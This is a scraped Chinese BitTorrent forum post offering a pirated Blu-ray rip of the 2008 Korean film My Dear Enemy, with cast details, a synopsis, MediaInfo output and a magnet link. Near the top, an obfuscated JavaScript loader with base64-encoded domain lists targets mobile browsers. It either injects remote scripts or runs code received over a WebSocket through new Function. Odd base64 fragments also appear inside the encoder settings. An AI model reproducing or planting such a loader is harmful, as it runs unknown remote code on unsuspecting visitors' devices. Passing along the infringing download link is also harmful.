精彩的一天[双语字幕]My.Dear.Enemy.2008.1080p.Bluray.x264.DTS-迅雷下载 9.31GB

版主小s 19天前 1000

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 精彩的一天 / My Dear Enemy / 一日潇洒 / 爱情回水一日游 / 美好的一天

◎片 名 ?? ??

◎年 代 2008

◎产 地 韩国

◎类 别 剧情 / 喜剧 / 爱情

◎语 言 韩语

◎上映日期 2008-09-25(韩国)

◎IMDb链接 https://www.imdb.com/title/tt1330205/

◎豆瓣评分 7.6/10 (6921人评价)

◎豆瓣链接 https://movie.douban.com/subject/3319775/

◎片 长 123分钟

◎导 演 李胤基 Yoon-ki Lee (id:1275997)

◎编 剧 朴恩泳 Eun-yeong Park (id:1346341)

李胤基 Yoon-ki Lee (id:1275997)

平安寿子 Asuko Taira (id:1346383)

◎演 员 全度妍 Do-yeon Jeon (id:1067813)

河正宇 Jung-woo Ha (id:1032680)

吴智恩 Ji-eun Oh (id:1320256)

崔日华 Il-hwa Choi (id:1320869)

奇周峯 Joo-bong Ki (id:1051277)

金永敏 Young-min Kim (id:1042479)

金惠玉 Hye-ok Kim (id:1274613)

高瑞熙 Seo-hie Ko (id:1213408)

金希珍 Kim Hee-jung (id:1383534)

徐东元 Dong-won Seo (id:1348280)

梁银容 Eun-yong Yang (id:1013696)

陈庸旭 Jin Yong-wook (id:1381296)

金姬廷 Hee-jung Kim (id:1328880)

车雅伦 Ah-reum Cha (id:1425300)

韩孝周 Hyo-joo Han (id:1032675)

利禹镇 Ri Woo Jin (id:1454650)

朴闵英 Min-young Park (id:1448424)

郑宝熏 Bo-hun Jeong (id:1457296)

曹圣奎 David Cho (id:1319174)

◎标 签 河正宇 / 韩国 / 全度妍 / 韩国电影 / 爱情 / 剧情 / 2008 / 文艺

◎简 介

喜秀(全度妍 饰)年过三十却依然单身,事业、爱情无一成功的她是一个标标准准的“loser”,就当她快要跌落到人生谷底之时,喜秀突然想起,自己的前男友秉云(何正宇 饰)曾经向自己借过三百五十万韩元至今仍为归还,这笔巨款成为了喜秀最后的希望。

功夫不负有心人,喜秀终于找到了许久未曾联系的秉云,而直到此时,喜秀才发现,原来秉云的处境和自己相比好不到哪里去,他又怎么可能会有三百五十万的存款呢?好在秉云有着自己一套独特的圈钱技巧,那就是他英俊帅气的外表,靠着这张面皮,秉云开始了他的计划。一个走投无路的女人,一个浪迹天涯的男人,他们两人的纠葛会迎来怎样的结局呢?

  1. General

  2. Unique ID : 236097343754533863369714715046461991576 (0xB19EB1C5081A105E2902991355826A98)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.31 GiB

  7. Duration : 2 h 4 min

  8. Overall bit rate : 10.7 Mb/s

  9. Movie name : My Dear Enemy Blu-ray Disc?

  10. Encoded date : UTC 2021-07-14 10:18:06

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 2 h 4 min

  25. Bit rate : 9 143 kb/s

  26. Width : 1 920 pixels

  27. Height : 816 pixels

  28. Display aspect ratio : 2.35:1

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.243

  36. Stream size : 7.94 GiB (85%)

  37. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. ID in the original source medium : 4352 (0x1100)

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 2 h 4 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 16 bits

  55. Compression mode : Lossy

  56. Stream size : 1.31 GiB (14%)

  57. Language : Korean

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Text #1

  62. ID : 3

  63. ID in the original source medium : 4611 (0x1203)

  64. Format : PGS

  65. Muxing mode : zlib

  66. Codec ID : S_HDMV/PGS

  67. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  68. Duration : 2 h 0 min

  69. Bit rate : 30.8 kb/s

  70. Count of elements : 2589

  71. Stream size : 26.5 MiB (0%)

  72. Title : chs&eng

  73. Language : Chinese

  74. Default : Yes

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4612 (0x1204)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 2 h 0 min

  85. Bit rate : 29.7 kb/s

  86. Count of elements : 2589

  87. Stream size : 25.6 MiB (0%)

  88. Title : cht&eng

  89. Language : Chinese

  90. Default : No

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #3

  94. ID : 5

  95. ID in the original source medium : 4613 (0x1205)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 2 h 1 min

  101. Bit rate : 18.1 kb/s

  102. Count of elements : 2591

  103. Stream size : 15.7 MiB (0%)

  104. Title : chs

  105. Language : Chinese

  106. Default : No

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Text #4

  110. ID : 6

  111. ID in the original source medium : 4614 (0x1206)

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 2 h 0 min

  117. Bit rate : 18.4 kb/s

  118. Count of elements : 2589

  119. Stream size : 15.9 MiB (0%)

  120. Title : cht

  121. Language : Chinese

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Text #5

  126. ID : 7

  127. ID in the original source medium : 4609 (0x1201)

  128. Format : PGS

  129. Muxing mode : zlib

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 2 h 3 min

  133. Bit rate : 27.2 kb/s

  134. Count of elements : 2598

  135. Stream size : 24.1 MiB (0%)

  136. Title : eng

  137. Language : English

  138. Default : No

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Text #6

  142. ID : 8

  143. ID in the original source medium : 4608 (0x1200)

  144. Format : PGS

  145. Muxing mode : zlib

  146. Codec ID : S_HDMV/PGS

  147. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  148. Duration : 1 h 59 min

  149. Bit rate : 30.1 kb/s

  150. Count of elements : 2697

  151. Stream size : 25.8 MiB (0%)

  152. Title : kor

  153. Language : Korean

  154. Default : No

  155. Forced : No

  156. Original source medium : Blu-ray


  157. Menu

  158. 00:00:00.000 : Chapter 01

  159. 00:07:27.958 : Chapter 02

  160. 00:15:02.291 : Chapter 03

  161. 00:29:20.958 : Chapter 04

  162. 00:39:18.875 : Chapter 05

  163. 00:47:11.083 : Chapter 06

  164. 00:58:14.125 : Chapter 07

  165. 01:04:06.875 : Chapter 08

  166. 01:19:05.916 : Chapter 09

  167. 01:30:21.583 : Chapter 10

  168. 01:45:52.875 : Chapter 11

  169. 02:00:44.958 : Chapter 12


TAGS 剧情 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:E0AF3ED1015EFF12B929A871CB1757947631A6CC
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回